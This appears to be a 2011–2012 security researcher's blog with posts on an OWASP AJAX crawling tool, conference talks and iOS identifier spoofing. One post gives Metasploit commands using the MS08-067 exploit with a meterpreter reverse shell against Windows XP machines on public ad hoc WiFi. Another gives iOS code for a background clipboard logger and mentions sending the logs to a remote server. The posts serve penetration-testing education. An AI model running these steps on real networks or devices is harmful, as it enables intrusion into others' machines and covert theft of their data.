Posted by Skyler on February 6, 2012 – 4:41 pm
Hey everybody! Sorry I have been MIA for so long. Im currently doing some training, and its requiring 13 hour work days.
Anyway, there is an update to ACT that will enable users to utilize it as part of scripting, etc.
How you can help
I have released it as the first beta release for two reasons:
- I need more bug reports
- I want to know what new features people want
Also…
I am looking for a developer with interest/experience with the ZAP (Zed Attack Proxy) OWASP tool. Simon (the creator) and I have been discussing a plugin module to integrate ACT into ZAP as an installable extension (NOT a combination of the tools). If you are interested, please contact me.
Posted by Skyler on November 21, 2011 – 12:58 am
Yup, my AJAX Crawling Tool has been accepted as part of OWASP!
Check it out: https://www.owasp.org/index.php/OWASP_AJAX_Crawling_Tool
Posted by Skyler on November 2, 2011 – 12:05 pm
A few weeks ago Joshua Wright did a SANS webcast on Exploiting Modern Wireless Networks. For a long time WiFi attacks have focused on either cracking WEP, or brute forcing a WPA shared key. Josh goes over some of the new attack vectors against wireless and how you can use them in a penetration test.
My favorite slide had to do with that obscure “Free Public WiFi” SSID that we see all over the place. I see these all the time at airports, but also at hotels and other commonly utilized public wifi areas. Apparently this is the default name for ad-hoc networks that are created by Windows XP SP2. Obviously this gets us excited ( MS 08-067). If they are running an XP SP2 box, we can probably assume that the machine is not frequently administered, and most likely not patched. Here are the simple steps that Josh Wright provided in order to exploit this machine:
- Connect to the adhoc network
# iwconfig wlan1 essid "Free Public WiFi" mode adhoc
- Use tcpdump to find the IP (bolded IP below) of the XP box hosting the ad hoc network. Note: the hosting box will be broadcasting NetBIOS packets to help configure associated clients.
# tcpdump -ni wlan1 -s0 -nt
IP 169.254.131.118.138 > 169.254.255.255.138: NBT UDP PACKET(138)
- Configure your IP (for the reverse shell to shovel back to)
# ifconfig wlan1 196.254.1.1 netmask 255.255.0.0
# msconsole
# use exploit/windows/smb/ms08_067_netapi
# set PAYLOAD windows/meterpreter/reverse_tcp
# set LPORT 9999
# set RHOST 169.254.131.118
# set LHOST 169.254.1.1
# exploit
Pretty straight forward, huh? As always, thanks to the SANS teams for their awesome contributions to the security industry. Make sure to check out the new SANS Pen Testing blog! its fantastic!
Posted by Skyler on October 24, 2011 – 7:52 pm
I created this video in response to multiple and varying requests for information about the tool I just released. This demo shows how ACT can be utilized to more thoroughly enumerate an AJAX application, and then leverage those findings via your favorite attack proxy.
Go check out the demo here: http://vimeo.com/31059474
and download ACT here: http://code.google.com/p/fuzzops-ng/downloads/list
Posted by Skyler on October 21, 2011 – 9:09 am
Hey everybody! Sorry I haven’t posted recently! Lots has been going on here at school and with work. But don’t be dismayed! I have been hard at work! In the past I had posted my Web App and Web Service fuzzier. Well, after reviewing the code, and the level of bugs, I took it back to the drawing board! What I am releasing now is the alpha version of the crawling module of the tool.
Why the rewrite?
Well, the first release (FuzzOps) was very buggy and not very well designed. It did not allow for the type of flexibility that I wanted from the tool.
Why did you modularize the crawler?
After reviewing the purpose of the tool and hearing about some needs in the community, I felt like a portion (the fuzzer) of the project would essentially be “reinventing the wheel”. However, the crawler itself is a unique functionality that lots of security professionals would like to utilize. So rather than tying the AJAX crawling code to the fuzzer, I have made it a module that can be used with any proxy out there. Tying these tools together can then allow security experts to properly crawl their target web applications utilizing their favorite proxy.
ACT (AJAX Crawling Tool) is part of the FuzzOps-NG project. You can download it here:
http://code.google.com/p/fuzzops-ng/downloads/list
Make sure to read the README on the wiki page.
NOTE: ACT is heavily dependent upon the work done by Seleinum and Crawljax. Please acknowledge them for this tool’s heavy lifting.
Posted by Skyler on August 20, 2011 – 7:41 am
It was reported that as of iOS 5 Apple will no longer permit developers to utilize the device UDID (Unique Device Identifier). This has numerous functionality issues which will become evident (if they arn’t already). You can read the article here.
UDID
For those unfamiliar with iOS development, it is important to understand how UDIDs are utilized for use in applications. Rather than require the storage of credentials or a generated user ID within the user’s plist (properties) file, many applications rely upon an API call to locally grab the UDID and use that as the primary mode of identification between the server and the client. This removes the need to store passwords or other login credentials in a less safe environment. However, with the proposed changes developers will now need to generate their own unique IDs and store them within the applications plist file.
Application Spoofing/Hijacking
This change, however, may leave the device open to spoofing attacks (both targeted and brute-forced). Because a new application generated identifier will now reside within user accessible storage, the application is forced to trust possibly modified data. Any sort of salting or client-to-server encryption is also evaded because that is done by the application after fetching the stored ID and before the client contacts the server. This clearly stands out from normal network spoofing/hijacking, but can have the same result.
Solution
Admittedly, I havn’t put a ton of thought into a thorough solution. However, my initial assessment seems to indicate that if an application were to encrypt or encode the unique ID before sending it to the client, and again before storing it in the plist file. This would make modification of a stored ID impossible, as well as obfuscate it in transit to prevent sniffing the unencrypted ID. This bypasses the spoofing, as well as prevents a pass-the-hash type attack.
EDIT: Here is the proof-of-concept
iOS App Spoofing through plist Hijacking from Skyler Onken on Vimeo.
Posted by Skyler on August 19, 2011 – 6:21 pm
Well, BSidesLosAngeles was great!! Lots of great information.
I am providing a link to the slides from my presentation. I also want to give a special thanks to Dan Manson for his help.
I recommend going to the slideshare and downloading the actual ppt. I use quite a few transitions, so the slideshare overlaps those.
Solving the US Cyber Challenge: Cyber Quest
And the pcap: http://www.mediafire.com/?33xynmkr75zeauy
Posted by Skyler on August 13, 2011 – 11:59 pm
Here is a sweet link shared with me by a friend from the US Cyber Challenge. Its a great reference for Python, Perl, PHP and Ruby. It includes simple examples of common scripting uses, and shows them side-by-side with all 4 languages.
Hyperpolyglot
Enjoy!
Posted by Skyler on August 6, 2011 – 9:38 am
I will be presenting at BSidesLosAngeles. I will be going over the previous USCC Cyber Quest. Should be interesting. If your from the area make sure you get tickets soon!
http://www.securitybsides.com/w/page/36552449/BSidesLosAngeles
Posted by Skyler on June 29, 2011 – 11:23 am
I just went through the iGoat project released by OWASP. Some of the exercises were a bit fun. Although not very complex or in depth, they pointed out security holes and aspects of iOS technology that I was not aware of.
One of the exercises noted that a generic UIPasteboard object exists that all applications have access to unless they declare their own. I figured, hey, why not create a sort of logger that would snag the data whenever it was copied to the clipboard. Easy enough.
Here is the code. Its very simple. Not really practical considering it would never get into the app store, but fun proof-of-concept:
@implementation iSneakAppDelegate
... snip ...
- (void)applicationDidEnterBackground:(UIApplication *)application
{
dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_DEFAULT, 0), ^{
NSLog(@"starting...");
UIApplication* app = [UIApplication sharedApplication];
UIBackgroundTaskIdentifier *bgTask;
//Leave empty
bgTask = [app beginBackgroundTaskWithExpirationHandler:^{}];
NSString* string = [[UIPasteboard generalPasteboard] string];
while (true){
NSString *newString = [[UIPasteboard generalPasteboard] string];
if (![newString isEqualToString:string] && newString != nil){
NSLog(@"Pasteboard: %@",[[UIPasteboard generalPasteboard] string] );
string = [[UIPasteboard generalPasteboard] string];
}
sleep(5); //pause the loop for a few seconds
}
});
}
This is pretty straight forward. It starts a background process, giving it a blank expiration handler to ensure that the process continues forever. I then store the current value of the clipboard and begin a loop. the loop checks for any changes to the clipboard contents every 5 seconds. If it is different, it then logs it.
Obviously other things you would want to do is to setup a remote server that you could push the logged data out to. Also, UIPasteboard can have other things besides strings, so it would be nice to add some robustness to handle other forms of data.
